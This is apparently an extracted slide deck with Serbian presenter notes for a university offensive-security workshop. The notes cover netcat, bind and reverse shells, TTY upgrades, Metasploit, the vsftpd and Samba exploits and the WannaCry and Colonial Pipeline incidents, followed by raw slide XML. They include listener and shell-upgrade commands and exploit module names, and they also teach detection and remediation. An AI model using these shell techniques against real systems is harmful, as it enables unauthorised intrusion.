- Objasni kvalitet shell-a, jer je to nešto što niko ne očekuje: prvi shell koji dobiješ je obično glup. Nema strelica, nema tab dopune, Ctrl+C ubija sesiju.
- Poslednja rečenica sa slajda vredi izgovoriti: shell nije cilj, to je trenutak kada beleške postaju ozbiljne.
Iz prakse:
Pitaj ih šta misle da je prvo što treba uraditi kada dobiješ shell. Većina će reći "gledati fajlove". Tačan odgovor je: proveriti ko si i zapisati vreme. `id`, `hostname`, `date`. To je ono što ide u izveštaj i to je ono što klijent traži kada te pita "kada tačno ste bili unutra".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40: netcat, oko 5 min
Poenta: netcat čita sa mreže i piše na ekran, i obrnuto. To je sve, i zato radi sve.
Šta da pričaš:
- Prođi šest primera sa slajda, ali ne kao spisak nego kao priču: isti alat radi banner grabbing, slušanje, prenos fajlova i chat.
- Objasni zastavice jednom i zauvek: listen, verbose, numeric, port. Neka to ponove naglas, to je mnemonika koja ostaje.
- Reci da je netcat iz 1995. i da ga je napisao neko pod pseudonimom Hobbit, i da je nadimak "TCP/IP švajcarski nožić" star koliko i alat.
Iz prakse:
Bitno upozorenje koje odmah spašava pola sale kasnije: `-e` zastavica ne postoji u većini modernih netcat verzija. Distribucije su je namerno izbacile jer je previše lako napraviti backdoor. Zato postoji ona `mkfifo` varijanta koja izgleda komplikovano. Ako ne kažeš ovo sada, na zadatku 4 ćeš imati petnaest ruku u vazduhu.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41: Bind shell, oko 4 min
Poenta: meta otvara port i čeka, a ti si klijent. I to skoro nikada ne radi.
Šta da pričaš:
- Prođi dijagram sleva nadesno. Meta sluša na 4444, ti se povezuješ.
- Objasni zašto ne radi: bilo koji firewall odbija tvoju dolaznu vezu. A ako je meta iza NAT-a, kod kuće ili u firmi, nema ni na šta da se povežeš.
- Reci da je bind shell koristan za razumevanje i za lab, ali da ga u praksi retko koristiš.
Pitaj ih: ako je meta laptop zaposlenog koji radi od kuće, možeš li da se povežeš na njegov port 4444? Odgovor je ne, i to prirodno uvodi sledeći slajd.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42: Reverse shell, oko 5 min
Poenta: ti slušaš, meta zove tebe, i zato ovo radi.
Šta da pričaš:
- Objasni zašto izlazni saobraćaj prolazi: firewalls skoro uvek dozvoljavaju izlaz, posebno ka 80 i 443. Mreža koja blokira izlaz je retka i teška za održavanje.
- Zato su svi payloadi u Metasploitu koje će izabrati reverse payloadi.
- Najvažnija praktična stvar: prvo pokreni slušalac, pa onda payload. Ako meta pozove a niko se ne javi, gubiš i shell i često pokušaj exploita.
Iz prakse:
Ovo je greška koju svako napravi bar jednom: pokreneš exploit, exploit uspe, meta zove nazad, a `nc -lvnp 4444` nije pokrenut. Exploit ti kaže "session opened" pa odmah "session closed" i ti ne razumeš zašto. Kada čuješ tu rečenicu u sali, prvo pitanje je: da li ti je slušalac radio.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43: One lineri, oko 5 min
Poenta: ne biraš šta je instalirano na meti, zato znaš više varijanti.
Šta da pričaš:
- Prođi četiri varijante i objasni zašto ih ima toliko: neke mašine nemaju netcat, neke imaju netcat bez `-e`, neke imaju samo python, neke samo php.
- Bash varijanta sa `/dev/tcp` je najlepša jer ne zahteva nijedan dodatni alat, ali radi samo ako je shell zaista bash, ne dash.
- Reci im da bookmarkuju revshells.com. To je alat u koji ukucaš svoju IP adresu i port i dobiješ sve varijante. Nema smisla da uče napamet ono što mogu da generišu.
Iz prakse:
Kada nešto ne radi, redosled provere je uvek isti: je li IP adresa tačna, je li port tačan, je li slušalac pokrenut, i da li meta uopšte ima taj interpreter. Devedeset odsto problema je jedna od te četiri stvari.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44: Uhvati ga i učini upotrebljivim, oko 5 min
Poenta: dva minuta uloženih u TTY upgrade štede ti pola sata nerviranja.
Šta da pričaš:
- Prođi levu sliku: slušalac hvata konekciju, ti kucaš `id` i vidiš root.
- Prođi desnu sliku korak po korak. `python3 -c 'import pty; pty.spawn("/bin/bash")'`, pa Ctrl+Z, pa `stty raw -echo; fg`, pa `export TERM=xterm`.
- Objasni zašto: bez pravog TTY-ja, `su`, `sudo` i `passwd` odbijaju da rade uopšte. Nije stvar udobnosti nego funkcionalnosti.
- Ctrl+C bez upgrade-a ubija sesiju, a ne komandu. To je bolno kada si tri koraka duboko.
Iz prakse:
Neka probaju `su` pre upgrade-a i posle. Kada vide poruku "must be run from a terminal", odmah shvate zašto je ovo bitno. To je demonstracija koja traje trideset sekundi i vredi više od objašnjenja.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45: Zadatak 4, 10 min plus 10 min pregleda
Kako da vodiš zadatak:
- Uparuj ih ako ikako možeš. Jedan je napadač, drugi je meta. Time i uče i vide obe strane.
- Očekuj zastoj na `-e` zastavici. Podseti ih na mkfifo varijantu.
- Traži da urade `id` u oba shell-a i da uporede.
- Poslednje pitanje, šta se dešava kada pritisnu Ctrl+C pre upgrade-a, neka stvarno probaju. Neka izgube sesiju. To je lekcija koja se pamti samo ako boli.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46: Divider, sekcija 06
Jedna rečenica: "Sve što smo do sada radili ručno, sada radi neko drugi umesto nas. To je i dobra i loša vest."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47: Šta je Metasploit, oko 5 min
Poenta: framework, ne dugme.
Šta da pričaš:
- Kratka istorija: H.D. Moore ga je napravio 2003. u Perlu, kasnije je prepisan u Ruby, a Rapid7 ga je preuzeo 2009. Danas je i dalje standard koji se uči prvi.
- Prođi šest tipova modula. Zadrži se na razlici između `exploit` i `auxiliary`, jer studenti misle da je Metasploit samo za exploite. Auxiliary moduli su skeneri i enumeracija, i koristićeš ih češće nego što misliš.
- Upozorenje sa dna slajda izgovori polako: Metasploit će ti dati root a da te ništa ne nauči. Koristi ga pošto razumeš šta exploit radi, a ne umesto razumevanja.
Iz prakse:
Kada budeš na razgovoru za posao, niko te neće pitati da li umeš da pokreneš `use exploit/...`. Pitaće te šta se tačno dešava kada ga pokreneš. Ljudi koji znaju samo Metasploit se prepoznaju za dva minuta razgovora.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48: msfconsole petlja, oko 5 min
Poenta: osam koraka, uvek isti redosled.
Šta da pričaš:
- Prođi korake redom i pokaži uživo ako imaš vremena. `search`, `use`, `info`, `show options`, `set RHOSTS`, `set LHOST`, `check`, `exploit`.
- Insistiraj na `info` koraku. To je korak koji svi preskaču, a tu piše koje verzije modul zaista pogađa i pod kojim uslovima radi.
- `check` postoji samo kod nekih modula, ali kada postoji, koristi ga pre nego što pucaš.
- Objasni `sessions -l`, `sessions -i 1` i `background`, jer će im trebati odmah.
Iz prakse:
Najčešća greška u celom danu: `LHOST` postavljen na adresu mete. LHOST je tvoja adresa, adresa na koju meta treba da se javi. Kada exploit "uspe" a ništa se ne desi, to je prvo što proveravaš. Reci to ovde, pa ponovi na zadatku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49: Payloadi, oko 5 min
Poenta: kosa crta ili donja crta, i to je razlika između dve konekcije i jedne.
Šta da pričaš:
- Staged: `linux/x86/meterpreter/reverse_tcp`, kose crte. Mali prvi deo sleti, pozove kući i skine ostatak.
- Stageless: `linux/x86/meterpreter_reverse_tcp`, donja crta. Sve stiže odjednom, veće je ali radi kada mreža dozvoljava samo jednu vezu.
- Ovo je detalj koji izgleda kao sitnica dok ne provedeš sat vremena čudeći se zašto payload ne radi.
- Objasni izbor između običnog shell-a i meterpretera: običan shell radi svuda i ne radi ništa dodatno, meterpreter ima prenos fajlova, port forwarding, hashdump.
- Uzmi najmanju stvar koja radi. Meterpreter je teži i mnogo verovatnije da će ga uhvatiti zaštita na pravoj meti.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50: Walkthrough 1, vsftpd 2.3.4, oko 6 min
Poenta: ovo nije bug, ovo je backdoor koji je neko namerno ubacio u zvanični tarball.
Šta da pričaš:
- Ispričaj priču, jer je odlična: jula 2011. neko je provalio na server sa kog se preuzima vsftpd i izmenio izvorni kod. Ako se prijaviš korisničkim imenom koje sadrži smajli, daemon otvori root shell na portu 6200.
- Chris Evans, autor vsftpd, primetio je za nekoliko dana i podigao uzbunu. Šteta je bila ograničena, ali je verzija ostala zauvek u svakoj trening mašini.
- Poveži to sa savremenim rečnikom: ovo je supply chain napad, petnaest godina pre nego što je taj izraz postao popularan.
- Tehnički: nema izbora payloada, jer je backdoor sam po sebi payload. Sletiš odmah kao root.
Iz prakse:
Dobro pitanje za salu: kako bi uopšte primetio da je tarball koji si skinuo izmenjen? Odgovor vodi u potpise, checksum-ove i reproducible builds. To je tema koju ne moraš da razvijaš, ali je dobro da im postaviš pitanje da o njemu razmišljaju.
Podseti ih i na UnrealIRCd na portu 6667 na istoj mašini, koji je isto imao backdoor u zvaničnom tarballu, između 2009. i 2010. Dva ista slučaja na jednoj mašini nisu slučajnost, to je ilustracija koliko je taj problem star.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51: Walkthrough 2, Samba usermap_script, oko 6 min
Poenta: command injection, ista klasa greške kao u web aplikacijama, samo u mrežnom servisu.
Šta da pričaš:
- Objasni mehaniku: Samba 3.0.20 prosleđuje korisničko ime pravo u shell komandu kada je uključena opcija `username map script`.
- Pošalješ korisničko ime koje sadrži shell metakaraktere i Samba ti ga izvrši, kao root, pre autentikacije.
- Naglasi to "pre autentikacije". Ne treba ti nijedan kredencijal.
- Za razliku od prethodnog primera, ovde biraš payload i moraš da postaviš LHOST.
Iz prakse:
Ako imaš studente koji su radili web bezbednost u prvom delu kursa, ovde napravi eksplicitnu vezu: ovo je isto što i command injection u PHP-u, samo što je ulaz korisničko ime u SMB protokolu umesto polja u formi. Klasa greške je ista, mesto je drugo. Kada to shvate, prestaju da uče napamet i počinju da prepoznaju obrasce.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52: Meterpreter, oko 4 min
Poenta: deset komandi pokriva sve što ti stvarno treba.
Šta da pričaš:
- Prođi listu brzo, zadrži se na `portfwd` jer je to jedina komanda koju ne razumeju odmah. Objasni pivoting u jednoj rečenici: probijena mašina postaje tvoj prolaz do mreže koju inače ne vidiš.
- `local_exploit_suggester` je zgodan, ali reci im da mu ne veruju slepo.
- Poenta sa dna slajda: meterpreter radi u memoriji, ništa se ne piše na disk. Zbog toga ga branioci i traže u memoriji.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53: Zadatak 5, 15 min plus 10 min pregleda
Kako da vodiš zadatak:
- Ovo je najduži zadatak i najvredniji. Neka svako izabere svoj servis, ne diriguj im metu.
- Insistiraj na `info` koraku pre pokretanja. Pitaj nekog nasumično šta je pročitao.
- Očekuj tri greške: pogrešan LHOST, nepokrenut slušalac, i pogrešna verzija modula za tu metu.
- Kod pregleda traži trokorak na kraju: kako sam našao, kako sam ušao, šta bih rekao vlasniku da popravi. Taj treći deo je ono što ih razlikuje od skript kiddie-ja i to je ono što ide u izveštaj.</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54: WannaCry, oko 7 min
Poenta: zakrpa je postojala pedeset devet dana ranije. To je cela priča.
Šta da pričaš:
- Postavi scenu: 12. maj 2017, petak. Nema mejla, nema klika, nema korisnika u lancu. Ako je mašina bila upaljena i port 445 dostupan, bila je šifrovana.
- Prođi vremensku liniju sa slajda naglas, jer je redosled datuma poenta: Microsoft objavljuje MS17-010 u martu, Shadow Brokers objavljuju ukradeni EternalBlue u aprilu, WannaCry kreće u maju.
- Objasni odakle EternalBlue: razvijen u NSA, ukraden i objavljen. To pokreće raspravu o tome da li države treba da čuvaju ranjivosti za sebe. Dobra tema ako imaš vremena.
- Prođi brojke: oko 200 hiljada mašina, preko 150 zemalja, 48 NHS trustova, oko 20 hiljada otkazanih pregleda.
- Kontrast koji vredi izgovoriti: napadači su skupili oko 143 hiljade dolara, a šteta se meri u milijardama. Ovo nije bio unosan posao, bio je destruktivan.
Iz prakse:
Ispričaj priču o kill switch-u, sala je voli: istraživač Marcus Hutchins je registrovao domen zakucan u malver, za oko deset dolara, i time usporio globalnu epidemiju. Malver je pre šifrovanja proveravao da li taj domen postoji, i ako postoji, stajao je. Deset dolara i par sati radoznalosti.
Ako hoćeš da produžiš priču: mesec i po kasnije, u junu 2017, isti exploit je iskorišćen u NotPetya napadu. Maersk je morao da ponovo izgradi hiljade servera, a kopiju Active Directory-ja su spasili zahvaljujući kancelariji u Gani koja je u trenutku napada bila bez struje. Bela kuća je štetu od NotPetya procenila na oko deset milijardi dolara. To je najskuplji sajber napad u istoriji i počeo je istim portom 445 koji su oni danas skenirali.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55: Iste korake ste već uradili, oko 5 min
Poenta: ništa u tom lancu nije iznad onoga što su radili jutros. Razlika je razmera i dozvola.
Šta da pričaš:
- Prođi tabelu red po red i za svaki korak pokaži kolonu desno, gde piše šta su oni radili.
- Skeniranje: crv je skenirao podmrežu i nasumične internet opsege tražeći 445. Oni su radili `-p445` po svojoj podmreži.
- Enumeracija: crv je proveravao da li mašina priča SMBv1 i da li je zakrpa primenjena. To radi `smb-vuln-ms17-010` skripta.
- Eksploatacija: modul postoji u Metasploitu i zove se `ms17_010_eternalblue`.
- Propagacija: svaka nova žrtva je postala skener. To je pentest petlja sa slajda 7, automatizovana i puštena na svet.
- Završi rečenicom sa dna slajda i pusti da odjekne dve sekunde.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56: Colonial Pipeline, oko 6 min
Poenta: bez exploita, bez zero day-a. Jedna lozinka za nalog koji niko više nije koristio.
Šta da pričaš:
- Postavi kontekst: oko 8800 kilometara cevovoda, oko 45 odsto goriva za istočnu obalu SAD. Kada stane, ljudi to osete istog dana.
- Prođi vremensku liniju: ulaz 29. aprila 2021. preko starog VPN naloga, krađa podataka početkom maja, ransom poruka 7. maja, gašenje cevovoda, panično kupovanje goriva, ponovno pokretanje 12. maja.
- Prođi tri činjenice sa slajda: nalog nije imao MFA, nalog je bio neaktivan ali omogućen, a lozinka je bila složena ali se pojavila u bazi iscurelih lozinki.
- Naglasi da je izvršni direktor Joseph Blount o ovome svedočio pred američkim Senatom i da je otvoreno rekao da je nalog imao samo jedan faktor. Kada direktor kompanije mora da objašnjava senatorima šta je MFA, to je trenutak kada je sajber bezbednost postala tema za upravni odbor.
- Firma je platila oko 4,4 miliona dolara otkupa. Deo tog novca je FBI kasnije povratio, ali cevovod nije zbog toga proradio brže.
Iz prakse:
Poveži direktno sa slajdom 40: ovo je credential stuffing u čistom obliku. Bez pogađanja, bez hydre, bez buke. Neko je uzeo par koji je već postojao i probao ga.
Poenta koju treba naglasiti: nije problem bio što je lozinka bila slaba, jer nije bila. Problem je bio što je jedna lozinka bila jedina stvar između interneta i mreže.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57: Šta oba slučaja uče, oko 5 min
Poenta: pet kontrola bi zaustavilo oba, i nijedna nije egzotična.
Šta da pričaš:
- Prođi tri kolone. Ulaz je bio poznat i jeftin, niko nije gledao dosadne signale, a domet je bio posledica dizajna mreže.
- Objasni segmentaciju konkretno: kod Colonial-a je zid između poslovne i operativne mreže razlog zašto je ovo bila kriza sa gorivom, a ne fizička nesreća. Kod WannaCry-ja je ravna mreža razlog zašto je crv stigao svuda.
- Pročitaj pet kontrola sa slajda naglas: krpljenje po rasporedu, MFA svuda, uklanjanje neaktivnih naloga, segmentacija, čitanje logova.
- Završi tako što ih vežeš za njihov posao: to je tačno ono što njihov izveštaj treba da traži. Ne "poboljšati bezbednosnu poziciju", nego ovih pet stvari, konkretno.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58: Pogled sa druge strane, oko 5 min
Poenta: sve što su danas radili ostavilo je trag, i to lako uočljiv.
Šta da pričaš:
- Prođi izlaz sa slajda: hiljade neuspelih login pokušaja u `auth.log` za četrdeset sekundi, pa jedan uspešan.
- Objasni zašto je to lako uhvatiti: jedna mašina koja dodiruje 65535 portova ne liči ni na šta normalno.
- Reverse shell sa servera je signal koji svaki branilac želi da hvata: baza podataka koja iznenada zove neku nasumičnu adresu na portu 4444 nema legitiman razlog da to radi.
- Poveži sa njihovom budućnošću: plavi i crveni tim su isto znanje, čitano u suprotnim smerovima. Većina njih će raditi na plavoj strani, i ovo je razlog zašto uče crvenu.
Iz prakse:
Preporuka sa slajda je iskrena i vredi je ponoviti: neka ponove skenove sa otvorenim Wireshark-om. Dvadeset minuta gledanja u SYN pakete i RST odgovore nauči više o TCP-u nego cela ova prezentacija. Reci im to baš tako, bez lažne skromnosti, jer je tačno.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59: Izveštaj je proizvod, oko 5 min
Poenta: šest delova, i bez ijednog od njih nalaz se ignoriše.
Šta da pričaš:
- Prođi šest polja. Zadrži se na Evidence i Remediation, jer su to dva mesta gde početnici najviše greše.
- Evidence znači komanda i izlaz, neizmenjeni. Ne prepričavanje.
- Remediation mora biti konkretna: "isključiti anonimni pristup na FTP servisu", a ne "poboljšati bezbednosnu poziciju". Ako administrator ne može da pročita tvoju preporuku i uradi je istog dana, nisi završio posao.
- Severity nije samo CVSS broj. Objasni zašto: isti CVE na test mašini i na domenskom kontroleru nisu isti rizik.
- Piši dok je shell još otvoren. Rekonstrukcija dokaza tri dana kasnije je način na koji se detalji izmišljaju.
Iz prakse:
Ako imaš primer sanitizovanog izveštaja iz svoje prakse, ovo je trenutak da ga pokažeš na projektoru na trideset sekundi. Studenti gotovo nikada ne vide kako pravi izveštaj izgleda, pa misle da je to formalnost. Jedan pogled na pravi dokument menja im predstavu.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60: Pitanja, oko 5 min
Poenta: ostavi vremena, i ostavi kontakt.
Šta da pričaš:
- Ne završavaj rečenicom "to je to". Završi konkretno: šta je sledeći korak i do kada.
- Ponovi mejl naglas i reci da smeju da pišu i kada pitanje nije vezano za predavanje.
- Ako je ostalo vremena, ne popunjavaj ga. Tišina posle "ima li pitanja" traje otprilike sedam sekundi pre nego što se neko usudi. Izdrži tih sedam sekundi, obično posle njih krene najbolji deo predavanja.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pn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png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3"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pn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image" Target="../media/image-58-1.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3"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image-60-1.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-60-2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-60-3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-60-4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-60-5.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6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0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191695" cy="54864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="img/nmap_eye.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="28000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452360" y="1417320"/>
            <a:ext cx="4206240" cy="2450592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="7315200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" spc="200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OFFENSIVE SECURITY OPERATIONS 2026</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="1920240"/>
            <a:ext cx="8229600" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2880360"/>
            <a:ext cx="8229600" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4114800"/>
            <a:ext cx="6949440" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scanning, enumeration, credentials, shells and exploitation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Two sessions, one target, zero prior experience required.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5230368"/>
            <a:ext cx="3108960" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5394960"/>
            <a:ext cx="6400800" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Marko Gordic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>marko@thecyberprotect.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PMF Kragujevac  //  28 - 29 August 2026</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>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01</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BEFORE WE START</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What you need open on your screen</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02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1463040"/>
            <a:ext cx="6858000" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
